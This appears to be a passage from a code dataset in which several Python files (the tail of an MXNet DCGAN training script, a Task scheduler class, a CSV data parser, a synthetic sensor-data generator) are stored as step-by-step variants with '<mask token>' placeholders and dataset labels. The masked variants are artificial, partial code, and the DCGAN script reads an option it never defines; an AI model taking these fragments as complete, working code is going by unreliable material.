pred_unique_path)\n history.plot(save_path='logs/histories-dcgan')\n if should_save_checkpoint:\n if ep % save_per_epoch == 0:\n generator.save_parameters(os.path.join(save_dir,\n 'generator_{:04d}.params'.format(ep)))\n discriminator.save_parameters(os.path.join(save_dir,\n 'discriminator_{:04d}.params'.format(ep)))\nhistory.plot(save_path='logs/histories-dcgan')\ngenerator.save_parameters(os.path.join(save_dir, 'generator_{:04d}.params'.\n format(ep)))\n", "step-5": "# %% import libs\nimport os\nimport argparse\nimport logging as logger\nimport mxnet as mx\nimport tqdm\nfrom mxnet import autograd\nfrom mxnet import gluon\nfrom gluoncv.utils import makedirs\n\nimport datasets as gan_datasets\nfrom utils import vis, get_cpus, TrainingHistory\nimport models\n\nmx.random.seed(5)\nlogger.basicConfig(level=logger.INFO, filename='logs/train_loss-dcgan.log')\n\narg = argparse.ArgumentParser(description=\"training parameters\")\narg.add_argument('--lr', type=float, default=0.001, help='learning rate')\narg.add_argument('--batch', type=int, default=32, help='batch size')\narg.add_argument('--epoch', type=int, default=30000, help='training epochs')\narg.add_argument('--continue', type=bool, default=True, help='should continue with last checkpoint')\narg.add_argument('--save_checkpoint', type=bool, default=True, help='whether save checkpoint')\narg.add_argument('--save_per_epoch', type=int, default=250, help='save checkpoint every specific epochs')\narg.add_argument('--save_dir', type=str, default='saved/params-dcgan', help='check point save path')\narg.add_argument('--cuda', type=bool, default=False, help='whether use gpu, default is True')\narg.add_argument('--pred_per_gen', type=int, default=15, help='make a pred every specific epoch')\narg.add_argument('--validation', type=bool, default=False, help='whether use validation set, default: False')\narg.add_argument('--dataset', type=str, default='rem_face', help='rem, miku, face,rem_face')\n\nopt = arg.parse_args()\n\n# %% define parameters\nepoch = opt.epoch\nepoch_start = 0\nbatch_size = opt.batch\nlr = opt.lr\nshould_save_checkpoint = opt.save_checkpoint\nsave_per_epoch = opt.save_per_epoch\nsave_dir = opt.save_dir\npred_per_epoch = opt.pred_per_epoch\nshould_use_val = opt.validation\ndataset = opt.dataset\ndataset_loader = getattr(gan_datasets, 'load_{}'.format(dataset))\n\nCTX = mx.gpu() if opt.cuda else mx.cpu()\nlogger.info('Will use {}'.format(CTX))\n\n# %% define dataloader\nlogger.info(\"Prepare data\")\n# noinspection PyTypeChecker\ntfs_train = gluon.data.vision.transforms.Compose([\n gluon.data.vision.transforms.Resize(size=(256, 256), interpolation=2),\n gluon.data.vision.transforms.RandomFlipLeftRight(),\n gluon.data.vision.transforms.RandomSaturation(0.005),\n gluon.data.vision.transforms.ToTensor(),\n gluon.data.vision.transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n])\n\n# noinspection PyTypeChecker\ntfs_val = gluon.data.vision.transforms.Compose([\n gluon.data.vision.transforms.Resize(size=(256, 256), interpolation=2),\n gluon.data.vision.transforms.ToTensor(),\n gluon.data.vision.transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n])\n\ntrain_set, val_set = dataset_loader()\ntrain_loader = gluon.data.DataLoader(train_set.transform_first(tfs_train),\n batch_size=batch_size, shuffle=True,\n last_batch='rollover', num_workers=get_cpus(), pin_memory=True)\nif val_set:\n val_loader = gluon.data.DataLoader(val_set.transform_first(tfs_val),\n batch_size=batch_size, shuffle=False,\n last_batch='rollover', num_workers=get_cpus(), pin_memory=True)\n\n# %% define models\ngenerator = models.make_gen('v4')\ndiscriminator = models.make_dis()\ngenerator.initialize(init=mx.init.Normal(0.02), ctx=CTX)\ndiscriminator.initialize(init=mx.init.Normal(0.02), ctx=CTX)\nif getattr(opt, 'continue'):\n import utils\n\n makedirs(save_dir)\n epoch_start = utils.load_model_from_params(generator, discriminator, save_dir)\n logger.info('Continue training at {}, and rest epochs {}'.format(epoch_start, epoch - epoch_start))\n\ngenerator.hybridize()\ndiscriminator.hybridize()\n\n# %% prepare training\nlogger.info(\"Prepare training\")\nif should_use_val:\n history_labels = ['gloss', 'gval_loss', 'dloss', 'dval_loss']\nelse:\n history_labels = ['gloss', 'dloss']\nhistory = TrainingHistory(labels=history_labels)\nloss = gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)\ntrainer_gen = gluon.Trainer(generator.collect_params(), optimizer='adam', optimizer_params={\n 'learning_rate': lr,\n 'beta1': 0.5\n})\ntrainer_dis = gluon.Trainer(discriminator.collect_params(), optimizer='adam', optimizer_params={\n 'learning_rate': lr,\n 'beta1': 0.5\n})\ntrue_label = mx.nd.ones((batch_size,), ctx=CTX)\nfake_label = mx.nd.zeros((batch_size,), ctx=CTX)\n\n\ndef make_noises(bs):\n return mx.nd.random_normal(0, 1, shape=(bs, 512), ctx=CTX, dtype='float32').reshape((bs, 512, 1, 1))\n\n\npred_noise = make_noises(1)\nmx.nd.save('pred_noise', pred_noise)\n\n\ndef validation(g, d, val_loader):\n g_val_loss = 0.0\n d_val_loss = 0.0\n iter_times = 0\n for data, _ in tqdm.tqdm(\n val_loader,\n desc=\"Validating\",\n leave=False,\n unit='batch',\n unit_scale=True,\n mininterval=1,\n maxinterval=5,\n dynamic_ncols=True):\n iter_times += 1\n bs = len(data)\n nosise = make_noises(bs)\n data = data.as_in_context(CTX)\n with autograd.predict_mode():\n # loss for d\n out = d(data)\n err2real = loss(out, true_label)\n\n fake_img = g(nosise)\n out = d(fake_img)\n err2fake = loss(out, fake_label)\n\n err4dis = err2real + err2fake\n d_val_loss += err4dis.mean().asscalar()\n\n # loss for g\n fake_img = g(nosise)\n out = d(fake_img)\n err4gen = loss(out, true_label)\n g_val_loss += err4gen.mean().asscalar()\n return g_val_loss / iter_times, d_val_loss / iter_times\n\n\n# %% begin training\nd_iter_times = 0\ng_iter_times = 0\nd_update_times = 0\ng_update_times = 0\ng_train_loss = 0.0\nd_train_loss = 0.0\nlogger.info(\"Begin training\")\nfor ep in tqdm.tqdm(range(epoch_start, epoch + 1),\n total=epoch,\n desc=\"Total Progress\",\n leave=False,\n initial=epoch_start,\n unit='epoch',\n unit_scale=True,\n mininterval=10,\n maxinterval=100,\n dynamic_ncols=True):\n\n for data, _ in tqdm.tqdm(\n train_loader,\n desc=\"Epoch {}\".format(ep),\n leave=False,\n unit='batch',\n unit_scale=True,\n mininterval=1,\n maxinterval=5,\n dynamic_ncols=True):\n bs = len(data)\n nosise = make_noises(bs)\n data = data.as_in_context(CTX)\n # begin training discriminator\n with autograd.record():\n d_iter_times += 1\n d_update_times += 1\n # train with real image\n out = discriminator(data)\n err2real = loss(out, true_label)\n\n # train with fake image\n # detach the input, or its gradients will be computed\n with autograd.predict_mode():\n fake_img = generator(nosise)\n out = discriminator(fake_img.detach())\n err2fake = loss(out, fake_label)\n\n err4dis = err2real + err2fake\n err4dis.backward()\n trainer_dis.step(bs)\n d_train_loss += err4dis.mean().asscalar()\n\n if d_iter_times % 5 == 0:\n g_iter_times += 1\n g_update_times += 1\n # begin training generator\n with autograd.record():\n fake_img = generator(nosise)\n with autograd.predict_mode():\n out = discriminator(fake_img)\n err4gen = loss(out, true_label)\n err4gen.backward()\n trainer_gen.step(bs)\n g_train_loss += err4gen.mean().asscalar()\n\n g_train_loss /= d_iter_times\n d_train_loss /= g_iter_times\n\n # use validation set or not\n if should_use_val:\n g_val_loss, d_val_loss = validation(generator, discriminator, val_loader)\n history.update([g_train_loss, g_val_loss, d_train_loss, d_val_loss])\n logger.info(\"Generator[train: {}, val: {}]\".format(g_train_loss, g_val_loss))\n logger.info(\"Discriminator[train: {}, val: {}]\".format(d_train_loss, d_val_loss))\n else:\n history.update([g_train_loss, d_train_loss])\n logger.info(\"Generator[{}], Discriminator[{}]\".format(g_train_loss, d_train_loss))\n\n g_train_loss = 0.0\n d_train_loss = 0.0\n d_iter_times = 0\n g_iter_times = 0\n\n # make a prediction\n if g_update_times % pred_per_epoch == 0:\n fake = generator(make_noises(1))[0]\n unique_fake = generator(pred_noise)[0]\n pred_path = 'logs/pred-dcgan'\n pred_unique_path = os.path.join(pred_path, 'unique')\n makedirs(pred_path)\n makedirs(pred_unique_path)\n vis.show_img(fake.transpose((1, 2, 0)), save_path=pred_path)\n vis.show_img(unique_fake.transpose((1, 2, 0)), save_path=pred_unique_path)\n\n # save history plot every epoch\n history.plot(save_path='logs/histories-dcgan')\n\n # save checkpoint\n if should_save_checkpoint:\n if ep % save_per_epoch == 0:\n generator.save_parameters(os.path.join(save_dir, 'generator_{:04d}.params'.format(ep)))\n discriminator.save_parameters(os.path.join(save_dir, 'discriminator_{:04d}.params'.format(ep)))\n\nhistory.plot(save_path='logs/histories-dcgan')\ngenerator.save_parameters(os.path.join(save_dir, 'generator_{:04d}.params'.format(ep)))\n", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
from time import time class Task: def __init__(self, f, ready: float): self._f = f self._ready = ready def set_ready(self, ready: float) -> None: self._ready = ready def get_ready(self) -> float: return self._ready def __call__(self) -> None: self._f() def __lt__(self, other) -> bool: return self._ready < other.get_ready() def __str__(self): return "Task(" + str(self._ready) + ")"
normal
{ "blob_id": "b094693b11fdc4f5fbff30e79a9f82d40104611d", "index": 2697, "step-1": "<mask token>\n\n\nclass Task:\n <mask token>\n\n def set_ready(self, ready: float) ->None:\n self._ready = ready\n <mask token>\n\n def __call__(self) ->None:\n self._f()\n <mask token>\n\n def __str__(self):\n return 'Task(' + str(self._ready) + ')'\n", "step-2": "<mask token>\n\n\nclass Task:\n <mask token>\n\n def set_ready(self, ready: float) ->None:\n self._ready = ready\n\n def get_ready(self) ->float:\n return self._ready\n\n def __call__(self) ->None:\n self._f()\n <mask token>\n\n def __str__(self):\n return 'Task(' + str(self._ready) + ')'\n", "step-3": "<mask token>\n\n\nclass Task:\n\n def __init__(self, f, ready: float):\n self._f = f\n self._ready = ready\n\n def set_ready(self, ready: float) ->None:\n self._ready = ready\n\n def get_ready(self) ->float:\n return self._ready\n\n def __call__(self) ->None:\n self._f()\n <mask token>\n\n def __str__(self):\n return 'Task(' + str(self._ready) + ')'\n", "step-4": "<mask token>\n\n\nclass Task:\n\n def __init__(self, f, ready: float):\n self._f = f\n self._ready = ready\n\n def set_ready(self, ready: float) ->None:\n self._ready = ready\n\n def get_ready(self) ->float:\n return self._ready\n\n def __call__(self) ->None:\n self._f()\n\n def __lt__(self, other) ->bool:\n return self._ready < other.get_ready()\n\n def __str__(self):\n return 'Task(' + str(self._ready) + ')'\n", "step-5": "from time import time\n\nclass Task:\n def __init__(self, f, ready: float):\n self._f = f\n self._ready = ready\n\n def set_ready(self, ready: float) -> None:\n self._ready = ready\n\n def get_ready(self) -> float:\n return self._ready\n\n def __call__(self) -> None:\n self._f()\n\n def __lt__(self, other) -> bool:\n return self._ready < other.get_ready()\n\n def __str__(self):\n return \"Task(\" + str(self._ready) + \")\"\n", "step-ids": [ 4, 5, 6, 7, 9 ] }
[ 4, 5, 6, 7, 9 ]
""" Program file: DataParser.py. This program parses and returns a dataset for a plotting program """ from sys import exit from csv import Sniffer, DictReader class DataParser: """ Summary: parses a data file, and returns list of the filtered data. Instances: 1. accepted_records 2. ignored_records Methods: 1. valid_value 2. create_reader 3. create_dataset 4. get_dataset """ def __init__(self, csvfile, data_centers): """DataParser constructor.""" self.accepted_records = [] self.ignored_records = [] with open(csvfile, 'r') as file: # Creates a reader object for later data manipulation reader = self.create_reader(file) # Resetting read/write pointer to beginning of file file.seek(0) # Creating list for graphing data center's dataset self.create_dataset(reader, data_centers) def valid_value(self, number): """ Summary: Checks that value is a valid positive number. Description: Accepts positive whole and decimal numbers. """ try: # Checking that entered value can be converted to a float. # Excludes letters and symbols. float(number) # Checking that validated number is nonnegative. if float(number) > 0: return True return False except ValueError: return False def create_reader(self, csvfile): """ Summary: Validates a csv file, returns a DictReader object. Description: Takes one argument: "data" (Should be a csv file) """ # Determines the dialect of the csv file for processing file_dialect = Sniffer().sniff(csvfile.read(1024)) # Resets the read/write pointer within the file csvfile.seek(0) # Checks to see that the csv file imported has a header row, # that will be used for later parsing. if not Sniffer().has_header(csvfile.read(1024)): print('Imported csv file lacks header row') exit() # Resets the read/write pointer within the file csvfile.seek(0) # Creates a DictReader object with the csvfile provided, and the # dialect object to define the parameters of the reader instance. reader = DictReader(csvfile, dialect=file_dialect) # Return DictReader object return reader def create_dataset(self, reader=None, data_centers=None): """ Summary: Creates a dataset of dcs and their respective times, values. Arguments: 'reader' defines a reader object used to read a csv file. 'dataCenters' is a list containing data center names that are to be graphed. """ for row in reader: # Checking that the 'DC' matches one defined in "data_centers" list if row.get('DC') in data_centers: # Validating DC's value is a positive nonnegative number. if not self.valid_value(row.get('Value')): # Archiving ignored records for later analysis self.ignored_records.append(row) else: self.accepted_records.append( [ row.get('DC'), float(row.get('Time')), float(row.get('Value')) ] ) def get_dataset(self): """Getter for accepted_records list.""" return self.accepted_records
normal
{ "blob_id": "af609f1558276bab96477d3a2c61d813b9dd3d82", "index": 9660, "step-1": "<mask token>\n\n\nclass DataParser:\n <mask token>\n\n def __init__(self, csvfile, data_centers):\n \"\"\"DataParser constructor.\"\"\"\n self.accepted_records = []\n self.ignored_records = []\n with open(csvfile, 'r') as file:\n reader = self.create_reader(file)\n file.seek(0)\n self.create_dataset(reader, data_centers)\n\n def valid_value(self, number):\n \"\"\"\n Summary: Checks that value is a valid positive number.\n\n Description: Accepts positive whole and decimal numbers.\n \"\"\"\n try:\n float(number)\n if float(number) > 0:\n return True\n return False\n except ValueError:\n return False\n\n def create_reader(self, csvfile):\n \"\"\"\n Summary: Validates a csv file, returns a DictReader object.\n\n Description: Takes one argument: \"data\" (Should be a csv file)\n \"\"\"\n file_dialect = Sniffer().sniff(csvfile.read(1024))\n csvfile.seek(0)\n if not Sniffer().has_header(csvfile.read(1024)):\n print('Imported csv file lacks header row')\n exit()\n csvfile.seek(0)\n reader = DictReader(csvfile, dialect=file_dialect)\n return reader\n <mask token>\n\n def get_dataset(self):\n \"\"\"Getter for accepted_records list.\"\"\"\n return self.accepted_records\n", "step-2": "<mask token>\n\n\nclass DataParser:\n <mask token>\n\n def __init__(self, csvfile, data_centers):\n \"\"\"DataParser constructor.\"\"\"\n self.accepted_records = []\n self.ignored_records = []\n with open(csvfile, 'r') as file:\n reader = self.create_reader(file)\n file.seek(0)\n self.create_dataset(reader, data_centers)\n\n def valid_value(self, number):\n \"\"\"\n Summary: Checks that value is a valid positive number.\n\n Description: Accepts positive whole and decimal numbers.\n \"\"\"\n try:\n float(number)\n if float(number) > 0:\n return True\n return False\n except ValueError:\n return False\n\n def create_reader(self, csvfile):\n \"\"\"\n Summary: Validates a csv file, returns a DictReader object.\n\n Description: Takes one argument: \"data\" (Should be a csv file)\n \"\"\"\n file_dialect = Sniffer().sniff(csvfile.read(1024))\n csvfile.seek(0)\n if not Sniffer().has_header(csvfile.read(1024)):\n print('Imported csv file lacks header row')\n exit()\n csvfile.seek(0)\n reader = DictReader(csvfile, dialect=file_dialect)\n return reader\n\n def create_dataset(self, reader=None, data_centers=None):\n \"\"\"\n Summary: Creates a dataset of dcs and their respective times, values.\n\n Arguments: 'reader' defines a reader object used to read a csv file.\n 'dataCenters' is a list containing data center names that are to be\n graphed.\n \"\"\"\n for row in reader:\n if row.get('DC') in data_centers:\n if not self.valid_value(row.get('Value')):\n self.ignored_records.append(row)\n else:\n self.accepted_records.append([row.get('DC'), float(row.\n get('Time')), float(row.get('Value'))])\n\n def get_dataset(self):\n \"\"\"Getter for accepted_records list.\"\"\"\n return self.accepted_records\n", "step-3": "<mask token>\n\n\nclass DataParser:\n \"\"\"\n Summary: parses a data file, and returns list of the filtered data.\n\n Instances:\n 1. accepted_records\n 2. ignored_records\n\n Methods:\n 1. valid_value\n 2. create_reader\n 3. create_dataset\n 4. get_dataset\n \"\"\"\n\n def __init__(self, csvfile, data_centers):\n \"\"\"DataParser constructor.\"\"\"\n self.accepted_records = []\n self.ignored_records = []\n with open(csvfile, 'r') as file:\n reader = self.create_reader(file)\n file.seek(0)\n self.create_dataset(reader, data_centers)\n\n def valid_value(self, number):\n \"\"\"\n Summary: Checks that value is a valid positive number.\n\n Description: Accepts positive whole and decimal numbers.\n \"\"\"\n try:\n float(number)\n if float(number) > 0:\n return True\n return False\n except ValueError:\n return False\n\n def create_reader(self, csvfile):\n \"\"\"\n Summary: Validates a csv file, returns a DictReader object.\n\n Description: Takes one argument: \"data\" (Should be a csv file)\n \"\"\"\n file_dialect = Sniffer().sniff(csvfile.read(1024))\n csvfile.seek(0)\n if not Sniffer().has_header(csvfile.read(1024)):\n print('Imported csv file lacks header row')\n exit()\n csvfile.seek(0)\n reader = DictReader(csvfile, dialect=file_dialect)\n return reader\n\n def create_dataset(self, reader=None, data_centers=None):\n \"\"\"\n Summary: Creates a dataset of dcs and their respective times, values.\n\n Arguments: 'reader' defines a reader object used to read a csv file.\n 'dataCenters' is a list containing data center names that are to be\n graphed.\n \"\"\"\n for row in reader:\n if row.get('DC') in data_centers:\n if not self.valid_value(row.get('Value')):\n self.ignored_records.append(row)\n else:\n self.accepted_records.append([row.get('DC'), float(row.\n get('Time')), float(row.get('Value'))])\n\n def get_dataset(self):\n \"\"\"Getter for accepted_records list.\"\"\"\n return self.accepted_records\n", "step-4": "<mask token>\nfrom sys import exit\nfrom csv import Sniffer, DictReader\n\n\nclass DataParser:\n \"\"\"\n Summary: parses a data file, and returns list of the filtered data.\n\n Instances:\n 1. accepted_records\n 2. ignored_records\n\n Methods:\n 1. valid_value\n 2. create_reader\n 3. create_dataset\n 4. get_dataset\n \"\"\"\n\n def __init__(self, csvfile, data_centers):\n \"\"\"DataParser constructor.\"\"\"\n self.accepted_records = []\n self.ignored_records = []\n with open(csvfile, 'r') as file:\n reader = self.create_reader(file)\n file.seek(0)\n self.create_dataset(reader, data_centers)\n\n def valid_value(self, number):\n \"\"\"\n Summary: Checks that value is a valid positive number.\n\n Description: Accepts positive whole and decimal numbers.\n \"\"\"\n try:\n float(number)\n if float(number) > 0:\n return True\n return False\n except ValueError:\n return False\n\n def create_reader(self, csvfile):\n \"\"\"\n Summary: Validates a csv file, returns a DictReader object.\n\n Description: Takes one argument: \"data\" (Should be a csv file)\n \"\"\"\n file_dialect = Sniffer().sniff(csvfile.read(1024))\n csvfile.seek(0)\n if not Sniffer().has_header(csvfile.read(1024)):\n print('Imported csv file lacks header row')\n exit()\n csvfile.seek(0)\n reader = DictReader(csvfile, dialect=file_dialect)\n return reader\n\n def create_dataset(self, reader=None, data_centers=None):\n \"\"\"\n Summary: Creates a dataset of dcs and their respective times, values.\n\n Arguments: 'reader' defines a reader object used to read a csv file.\n 'dataCenters' is a list containing data center names that are to be\n graphed.\n \"\"\"\n for row in reader:\n if row.get('DC') in data_centers:\n if not self.valid_value(row.get('Value')):\n self.ignored_records.append(row)\n else:\n self.accepted_records.append([row.get('DC'), float(row.\n get('Time')), float(row.get('Value'))])\n\n def get_dataset(self):\n \"\"\"Getter for accepted_records list.\"\"\"\n return self.accepted_records\n", "step-5": "\"\"\"\nProgram file: DataParser.py.\n\nThis program parses and returns a dataset for a plotting program\n\"\"\"\n\nfrom sys import exit\nfrom csv import Sniffer, DictReader\n\n\nclass DataParser:\n \"\"\"\n Summary: parses a data file, and returns list of the filtered data.\n\n Instances:\n 1. accepted_records\n 2. ignored_records\n\n Methods:\n 1. valid_value\n 2. create_reader\n 3. create_dataset\n 4. get_dataset\n \"\"\"\n\n def __init__(self, csvfile, data_centers):\n \"\"\"DataParser constructor.\"\"\"\n self.accepted_records = []\n self.ignored_records = []\n\n with open(csvfile, 'r') as file:\n # Creates a reader object for later data manipulation\n reader = self.create_reader(file)\n\n # Resetting read/write pointer to beginning of file\n file.seek(0)\n\n # Creating list for graphing data center's dataset\n self.create_dataset(reader, data_centers)\n\n def valid_value(self, number):\n \"\"\"\n Summary: Checks that value is a valid positive number.\n\n Description: Accepts positive whole and decimal numbers.\n \"\"\"\n try:\n # Checking that entered value can be converted to a float.\n # Excludes letters and symbols.\n float(number)\n\n # Checking that validated number is nonnegative.\n if float(number) > 0:\n return True\n return False\n except ValueError:\n return False\n\n def create_reader(self, csvfile):\n \"\"\"\n Summary: Validates a csv file, returns a DictReader object.\n\n Description: Takes one argument: \"data\" (Should be a csv file)\n \"\"\"\n # Determines the dialect of the csv file for processing\n file_dialect = Sniffer().sniff(csvfile.read(1024))\n\n # Resets the read/write pointer within the file\n csvfile.seek(0)\n\n # Checks to see that the csv file imported has a header row,\n # that will be used for later parsing.\n if not Sniffer().has_header(csvfile.read(1024)):\n print('Imported csv file lacks header row')\n exit()\n\n # Resets the read/write pointer within the file\n csvfile.seek(0)\n\n # Creates a DictReader object with the csvfile provided, and the\n # dialect object to define the parameters of the reader instance.\n reader = DictReader(csvfile, dialect=file_dialect)\n\n # Return DictReader object\n return reader\n\n def create_dataset(self, reader=None, data_centers=None):\n \"\"\"\n Summary: Creates a dataset of dcs and their respective times, values.\n\n Arguments: 'reader' defines a reader object used to read a csv file.\n 'dataCenters' is a list containing data center names that are to be\n graphed.\n \"\"\"\n for row in reader:\n # Checking that the 'DC' matches one defined in \"data_centers\" list\n if row.get('DC') in data_centers:\n # Validating DC's value is a positive nonnegative number.\n if not self.valid_value(row.get('Value')):\n # Archiving ignored records for later analysis\n self.ignored_records.append(row)\n else:\n self.accepted_records.append(\n [\n row.get('DC'),\n float(row.get('Time')),\n float(row.get('Value'))\n ]\n )\n\n def get_dataset(self):\n \"\"\"Getter for accepted_records list.\"\"\"\n return self.accepted_records\n", "step-ids": [ 5, 6, 7, 8, 9 ] }
[ 5, 6, 7, 8, 9 ]
import random import numpy as np import pandas as pd def linear_combination_plus_error(X, num_dependent_cols=5, parameter_mean=0, parameter_std=1, error_mean=0, error_std=1): """ Generate a column that is a random linear combination of X1, X2 and X3 plus some random error """ length = X.shape[0] param = np.random.normal(loc=parameter_mean, scale=parameter_std, size=(num_dependent_cols,)) error = np.random.normal(loc=error_mean, scale=error_std, size=(length,)) result = np.zeros(length,) for i in range(num_dependent_cols): result += param[i] * X[:, i] return result + error np.random.seed(472) num_data = 10100 num_independent_cols = 3 X = np.zeros((num_data, 1001)) # Generate 3 principal components for i in range(num_independent_cols): X[:, i] = np.random.normal(np.random.uniform(-5, 5), np.random.uniform(1, 5), size=(num_data,)) # Generate other columns for i in range(3, 1000): X[:, i] = linear_combination_plus_error(X, num_dependent_cols=num_independent_cols, parameter_std=2, error_std=1) # Randomly suffle the 1000 feature columns col_nums = list(range(1000)) np.random.shuffle(col_nums) X[:, list(range(1000))] = X[:, col_nums] # Randomly generate Y X[:, 1000] = linear_combination_plus_error(X, num_dependent_cols=num_independent_cols, parameter_mean=5, parameter_std=2) X[:, 1000] += abs(min(X[:, 1000])) + 5 # Take only three digits after decimal point X = np.floor(X * 1000) / 1000 # Split the data into 2 files X1 = X[:10000, :] X2 = X[10000:, :] X1_df = pd.DataFrame(X1) X1_df.to_csv("./sensors1.csv", header=None, index=None) X2_df = pd.DataFrame(X2) X2_df.to_csv("./sensors2.csv", header=None, index=None)
normal
{ "blob_id": "48f2cc5b6d53c7317ad882947cabbc367cda0fb7", "index": 905, "step-1": "<mask token>\n\n\ndef linear_combination_plus_error(X, num_dependent_cols=5, parameter_mean=0,\n parameter_std=1, error_mean=0, error_std=1):\n \"\"\"\n Generate a column that is a random linear combination of\n X1, X2 and X3 plus some random error\n \"\"\"\n length = X.shape[0]\n param = np.random.normal(loc=parameter_mean, scale=parameter_std, size=\n (num_dependent_cols,))\n error = np.random.normal(loc=error_mean, scale=error_std, size=(length,))\n result = np.zeros(length)\n for i in range(num_dependent_cols):\n result += param[i] * X[:, i]\n return result + error\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef linear_combination_plus_error(X, num_dependent_cols=5, parameter_mean=0,\n parameter_std=1, error_mean=0, error_std=1):\n \"\"\"\n Generate a column that is a random linear combination of\n X1, X2 and X3 plus some random error\n \"\"\"\n length = X.shape[0]\n param = np.random.normal(loc=parameter_mean, scale=parameter_std, size=\n (num_dependent_cols,))\n error = np.random.normal(loc=error_mean, scale=error_std, size=(length,))\n result = np.zeros(length)\n for i in range(num_dependent_cols):\n result += param[i] * X[:, i]\n return result + error\n\n\nnp.random.seed(472)\n<mask token>\nfor i in range(num_independent_cols):\n X[:, i] = np.random.normal(np.random.uniform(-5, 5), np.random.uniform(\n 1, 5), size=(num_data,))\nfor i in range(3, 1000):\n X[:, i] = linear_combination_plus_error(X, num_dependent_cols=\n num_independent_cols, parameter_std=2, error_std=1)\n<mask token>\nnp.random.shuffle(col_nums)\n<mask token>\nX[:, 1000] += abs(min(X[:, 1000])) + 5\n<mask token>\nX1_df.to_csv('./sensors1.csv', header=None, index=None)\n<mask token>\nX2_df.to_csv('./sensors2.csv', header=None, index=None)\n", "step-3": "<mask token>\n\n\ndef linear_combination_plus_error(X, num_dependent_cols=5, parameter_mean=0,\n parameter_std=1, error_mean=0, error_std=1):\n \"\"\"\n Generate a column that is a random linear combination of\n X1, X2 and X3 plus some random error\n \"\"\"\n length = X.shape[0]\n param = np.random.normal(loc=parameter_mean, scale=parameter_std, size=\n (num_dependent_cols,))\n error = np.random.normal(loc=error_mean, scale=error_std, size=(length,))\n result = np.zeros(length)\n for i in range(num_dependent_cols):\n result += param[i] * X[:, i]\n return result + error\n\n\nnp.random.seed(472)\nnum_data = 10100\nnum_independent_cols = 3\nX = np.zeros((num_data, 1001))\nfor i in range(num_independent_cols):\n X[:, i] = np.random.normal(np.random.uniform(-5, 5), np.random.uniform(\n 1, 5), size=(num_data,))\nfor i in range(3, 1000):\n X[:, i] = linear_combination_plus_error(X, num_dependent_cols=\n num_independent_cols, parameter_std=2, error_std=1)\ncol_nums = list(range(1000))\nnp.random.shuffle(col_nums)\nX[:, list(range(1000))] = X[:, col_nums]\nX[:, 1000] = linear_combination_plus_error(X, num_dependent_cols=\n num_independent_cols, parameter_mean=5, parameter_std=2)\nX[:, 1000] += abs(min(X[:, 1000])) + 5\nX = np.floor(X * 1000) / 1000\nX1 = X[:10000, :]\nX2 = X[10000:, :]\nX1_df = pd.DataFrame(X1)\nX1_df.to_csv('./sensors1.csv', header=None, index=None)\nX2_df = pd.DataFrame(X2)\nX2_df.to_csv('./sensors2.csv', header=None, index=None)\n", "step-4": "import random\nimport numpy as np\nimport pandas as pd\n\n\ndef linear_combination_plus_error(X, num_dependent_cols=5, parameter_mean=0,\n parameter_std=1, error_mean=0, error_std=1):\n \"\"\"\n Generate a column that is a random linear combination of\n X1, X2 and X3 plus some random error\n \"\"\"\n length = X.shape[0]\n param = np.random.normal(loc=parameter_mean, scale=parameter_std, size=\n (num_dependent_cols,))\n error = np.random.normal(loc=error_mean, scale=error_std, size=(length,))\n result = np.zeros(length)\n for i in range(num_dependent_cols):\n result += param[i] * X[:, i]\n return result + error\n\n\nnp.random.seed(472)\nnum_data = 10100\nnum_independent_cols = 3\nX = np.zeros((num_data, 1001))\nfor i in range(num_independent_cols):\n X[:, i] = np.random.normal(np.random.uniform(-5, 5), np.random.uniform(\n 1, 5), size=(num_data,))\nfor i in range(3, 1000):\n X[:, i] = linear_combination_plus_error(X, num_dependent_cols=\n num_independent_cols, parameter_std=2, error_std=1)\ncol_nums = list(range(1000))\nnp.random.shuffle(col_nums)\nX[:, list(range(1000))] = X[:, col_nums]\nX[:, 1000] = linear_combination_plus_error(X, num_dependent_cols=\n num_independent_cols, parameter_mean=5, parameter_std=2)\nX[:, 1000] += abs(min(X[:, 1000])) + 5\nX = np.floor(X * 1000) / 1000\nX1 = X[:10000, :]\nX2 = X[10000:, :]\nX1_df = pd.DataFrame(X1)\nX1_df.to_csv('./sensors1.csv', header=None, index=None)\nX2_df = pd.DataFrame(X2)\nX2_df.to_csv('./sensors2.csv', header=None, index=None)\n", "step-5": "import random\nimport numpy as np\nimport pandas as pd\n\ndef linear_combination_plus_error(X, num_dependent_cols=5, parameter_mean=0, parameter_std=1, error_mean=0, error_std=1):\n \"\"\"\n Generate a column that is a random linear combination of\n X1, X2 and X3 plus some random error\n \"\"\"\n length = X.shape[0]\n param = np.random.normal(loc=parameter_mean,\n scale=parameter_std,\n size=(num_dependent_cols,))\n error = np.random.normal(loc=error_mean,\n scale=error_std,\n size=(length,))\n result = np.zeros(length,)\n for i in range(num_dependent_cols):\n result += param[i] * X[:, i]\n return result + error\n \n\nnp.random.seed(472)\nnum_data = 10100\nnum_independent_cols = 3\n\nX = np.zeros((num_data, 1001))\n\n# Generate 3 principal components\nfor i in range(num_independent_cols):\n X[:, i] = np.random.normal(np.random.uniform(-5, 5), \n np.random.uniform(1, 5), size=(num_data,))\n\n\n# Generate other columns\nfor i in range(3, 1000):\n X[:, i] = linear_combination_plus_error(X, num_dependent_cols=num_independent_cols, parameter_std=2, error_std=1)\n\n# Randomly suffle the 1000 feature columns\ncol_nums = list(range(1000))\nnp.random.shuffle(col_nums)\nX[:, list(range(1000))] = X[:, col_nums]\n\n# Randomly generate Y\nX[:, 1000] = linear_combination_plus_error(X, num_dependent_cols=num_independent_cols, parameter_mean=5, parameter_std=2)\nX[:, 1000] += abs(min(X[:, 1000])) + 5\n\n\n# Take only three digits after decimal point\nX = np.floor(X * 1000) / 1000\n\n\n# Split the data into 2 files\nX1 = X[:10000, :]\nX2 = X[10000:, :]\nX1_df = pd.DataFrame(X1)\nX1_df.to_csv(\"./sensors1.csv\", header=None, index=None)\n\nX2_df = pd.DataFrame(X2)\nX2_df.to_csv(\"./sensors2.csv\", header=None, index=None)\n\n\n\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
